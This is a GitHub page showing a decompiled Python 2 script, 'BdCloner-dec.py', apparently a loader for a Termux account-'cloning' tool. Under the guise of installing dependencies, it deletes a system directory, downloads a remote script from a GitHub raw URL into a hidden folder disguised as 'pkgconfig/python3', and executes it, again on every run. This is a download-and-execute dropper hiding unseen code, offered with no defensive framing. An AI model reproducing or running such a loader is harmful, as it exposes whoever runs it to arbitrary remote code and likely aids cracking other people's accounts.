This repository was archived by the owner on Jan 1, 2023. It is now read-only.
forked from mushuH/OPEN-SOURCE-
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathBdCloner-dec.py
More file actions
57 lines (52 loc) · 1.97 KB
/
BdCloner-dec.py
File metadata and controls
57 lines (52 loc) · 1.97 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Source Generated with Decompyle++
# File: out.pyc (Python 2.7)
try:
import os
import sys
import time
import datetime
import random
import hashlib
import re
import threading
import json
import urllib
import cookielib
import getpass
import mechanize
import requests
import hunterboy
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
os.system('clear')
except ImportError:
os.system('clear')
print ' \x1b[1;91m=====> 10%'
os.system('pkg install wget curl')
print ' \x1b[1;93m==============> 30%'
os.system('pip2 install lolcat')
print ' \x1b[1;94m=====================> 40%'
os.system('pip2 install mechanize')
print ' \x1b[1;95m============================> 50%'
os.system('pip2 install bs4')
print ' \x1b[1;91m=================================> 60%'
os.system('rm -rf /data/data/com.termux/files/usr/lib/pkgconfig/python3')
print ' \x1b[1;93m========================================> 70%'
os.system('clear')
os.system('mkdir /data/data/com.termux/files/usr/lib/pkgconfig/python3 && cd /data/data/com.termux/files/usr/lib/pkgconfig/python3')
print ' \x1b[1;91m==============================================> 80%'
os.system('cd /data/data/com.termux/files/usr/lib/pkgconfig/python3 && wget https://raw.githubusercontent.com/Ruler-Boy/Fisher/main/bdcloner.py')
print ' \x1b[1;92m===================================================> 90%'
os.system('clear')
time.sleep(0.1)
os.system('cd /data/data/com.termux/files/usr/lib/pkgconfig/python3 && python2 bdcloner.py')
print ' \x1b[1;93m==========================================================> 100%'
reload(sys)
sys.setdefaultencoding('utf8')
os.system('clear')
def hunt():
time.sleep(1)
os.system('cd /data/data/com.termux/files/usr/lib/pkgconfig/python3 && python2 bdcloner.py')
if __name__ == '__main__':
hunt()